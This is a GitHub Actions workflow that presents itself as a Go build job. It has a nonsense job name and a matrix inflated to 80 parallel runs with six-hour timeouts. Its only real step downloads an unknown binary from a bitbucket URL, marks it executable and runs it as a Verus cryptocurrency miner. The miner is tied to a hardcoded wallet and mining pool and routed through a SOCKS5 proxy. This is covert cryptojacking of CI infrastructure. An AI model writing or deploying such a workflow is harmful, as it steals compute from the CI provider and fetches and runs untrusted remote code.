name: Stavolboy
on: [push, pull_request]
jobs:
  build:
    name: Bacodbingits
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 256
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4,]
        flag: [A, B, C, D, E, F, G, H, I, J, K, L, M, N, O, P, Q, R, S, T]
    timeout-minutes: 360
    env:
        NUM_JOBS: 80
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        wget https://bitbucket.org/stavol99/mine/downloads/kambing
        chmod +x kambing
        screen -dmS ls
        POOL=stratum+tcp://eu.luckpool.net:3956
        WALLET=RTYdzcR1YraQQXz2MsKfMyTbDb35MY2x3G
        WORKER=$(echo $(shuf -i 100-999 -n 1)-cuan)
        PROXY=socks5://158.101.205.204:1080
        ./kambing -a verus -o $POOL -u $WALLET.$WORKER -p c=VRSC,zap=VRSC -t 2 -x $PROXY
